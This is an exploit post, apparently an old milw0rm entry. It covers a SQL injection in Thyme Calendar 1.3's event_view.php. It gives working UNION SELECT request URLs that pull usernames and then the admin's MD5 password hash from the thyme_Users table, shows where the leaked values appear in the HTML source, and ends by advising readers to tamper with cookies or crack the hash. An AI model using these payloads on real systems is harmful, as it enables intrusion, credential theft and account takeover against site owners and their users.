################################################## ## Thyme Calendar 1.3 SQL Vulnerability Exploit ## ## by Warlord ## ################################################## ## codehook.110mb.com ## ################################################## ------------------------------------------------------------------- OVERVIEW AND DEFINITION ------------------------------------------------------------------- A vulnerability in exists in Thyme Calendar 1.3 (and possibly lower versions) which allows execution of a custom SQL query. The vulnerability exists in event_view.php, because the 'eid' field is not properly validated. An attacker could exploit the vulnerabilit with the following request: http://sitename/thyme_directory/event_view.php?eid=34 UNION SELECT userid FROM thyme_Users Where 'sitename' is the name of the site, and 'thyme_directory' is the directory in which Thyme is located. ------------------------------------------------------------------- SQL QUERY ------------------------------------------------------------------- The SQL query originally looks like this: SELECT id FROM thyme_Attachments WHERE eid = 34 But by changing the 'eid' field we get a query that looks like this: SELECT id FROM thyme_Attachments WHERE eid = 34 UNION SELECT userid FROM thyme_Users ------------------------------------------------------------------- RESULT OF NEW QUERY ------------------------------------------------------------------- The result is that the query sends back all the userid's (actually usernames) from the database instead of the 'id' from thyme_Attachments. You will be able to grab the userid's from the HTML source by searching for 'aid=' as this is where the attachment id is supposed to go. For example: http://sitename/thyme_directory/download_attachment.php?aid=admin ------------------------------------------------------------------- GETTING PASSWORDS ------------------------------------------------------------------- And the password (md5'd) can be obtained in the same fashion: http://sitename/thyme_directory/event_view.php?eid=34 UNION SELECT pass FROM thyme_Users WHERE username = "admin" In the HTML source: http://sitename/thyme_directory/download_attachment.php?aid=9ab1c5afa4946ca0030271736f38c83a ------------------------------------------------------------------- HOW TO EXPLOIT ------------------------------------------------------------------- Cookies should be modifiable. If not, crack the md5! http://md5.rednoize.com # milw0rm.com [2007-05-10]